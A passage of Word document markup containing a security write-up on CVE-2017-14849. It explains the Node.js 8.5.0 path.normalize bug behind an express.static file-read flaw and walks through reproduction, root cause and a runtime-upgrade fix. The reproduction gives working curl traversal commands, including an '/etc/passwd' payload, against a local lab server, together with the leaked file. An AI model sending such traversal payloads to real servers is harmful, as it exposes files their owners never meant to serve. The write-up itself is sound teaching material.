        <w:t>explains why, which is preferable to switching the rule off globally.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**SCA**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npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>found 0 vulnerabilities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reports are in [`evidence/`](evidence/).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&gt; **Note on the registry.** `npm audit` needs the registry's advisory endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>&gt; It is executed against `registry.npmjs.org`; a mirror such as npmmirror does</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>&gt; not implement `/-/npm/v1/security/advisories/bulk` and returns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>&gt; `[NOT_IMPLEMENTED]`.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 CVE analysis: CVE-2017-14849</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6.1 What the vulnerability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CVE | **CVE-2017-14849** |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Affected | Node.js **8.5.0** only (8.5.0 ≤ version &lt; 8.6.0) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Class | CWE-22 — Improper Limitation of a Pathname to a Restricted Directory (path traversal) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Impact | Arbitrary file read outside the web root |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>| Fixed in | Node.js **8.6.0**, 2017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Node.js 8.5.0 changed how `..` segments are handled inside `path.normalize()`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>The new implementation is wrong when a `..` appears *after* an ordinary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>segment in the middle of the path: it collapses too much of the prefix. Any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>framework that relies on `normalize()` to keep file access inside a directory —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>`express.static` via the `send` module is the textbook case — inherits the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>bug and starts serving files outside its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vulnerable application in this repository is the vulhub scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(`node/CVE-2017-14849`): a stock Express 4.15.5 static file server.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6.2 Reproduction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Because Docker is not available on the machine where this work was produced,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the same application and the same runtime version were used natively instead of</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>in a container. The result is identical: the vulnerable Node.js version is what</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>matters, not the packaging.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**Official path (Vulhub, requires Docker):**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git clone https://github.com/vulhub/vulhub.git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>cd vulhub/node/CVE-2017-14849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>docker compose build</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>docker compose up -d          # http://localhost:3000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**Path actually executed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1. application taken from vulhub (www/app.js, express 4.15.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>cd cve/CVE-2017-14849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>npm install                    # express 4.15.5</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official Node.js 8.5.0 runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl -L --ssl-no-revoke -o node8.zip \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  https://registry.npmmirror.com/-/binary/node/v8.5.0/node-v8.5.0-win-x64.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>tar -xf node8.zip -C C:\n850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start the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>C:\n850\node-v8.5.0-win-x64\node.exe www/app.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># Example app listening on port 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baseline: the static asset is served normally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl --path-as-is -s -o /dev/null -w '%{http_code}\n' \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">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the attack -- read a file that lives OUTSIDE www/static</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl --path-as-is -s -i \</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">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**Result:**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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>X-Powered-By: Express</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Accept-Ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Content-Type: text/plain; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Content-Length: 57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SECRET_FLAG{this-file-lives-outside-the-static-root}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file `secret.txt` sits in the project root, two levels above the directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>that `express.static()` is configured to serve. The server returned it anyway.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details that matter when reproducing this by hand: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`curl` normalises `..` in a URL by default. Without `--path-as-is` the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  payload never reaches the server and the attack appears not to work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* On Windows the exact payload differs from the Linux PoC in the vulhub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  README (`/static/../../../a/../../../../etc/passwd`), because the resulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  absolute path is built from a drive-letter root. The shape that escapes on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  Windows is `/static/../foo/../../secret.txt`.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6.3 Root cause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guard inside `send@0.15.6`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 send/index.js, line 538</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>if (UP_PATH_REGEXP.test(normalize('.' + sep + path))) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  return this.error(403)          // reject anything that still contains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line 545</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>path = normalize(join(root, path))  // then build the real path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check only works if `normalize()` is correct. Under Node 8.5.0 it is not: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```text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>$ node-v8.5.0 -e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node   v24 -e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leading `..` segments disappear in 8.5.0, so after normalisation there is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>nothing left for `UP_PATH_REGEXP` to match, the request is treated as a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>*clean* relative path, and `join(root, 'secret.txt')` is resolved — one level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>above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So the answer to "what kind of error is this" is: **a logic error in a language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>runtime library**, not a missing input filter and not a configuration mistake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>The application did exactly what the documentation told it to do; the standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>library lied about the meaning of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6.4 Fix</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fix is a runtime upgrade — `fixes/` contains the changed files.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```dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># before</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>FROM vulhub/node:8.5.0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minimal fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
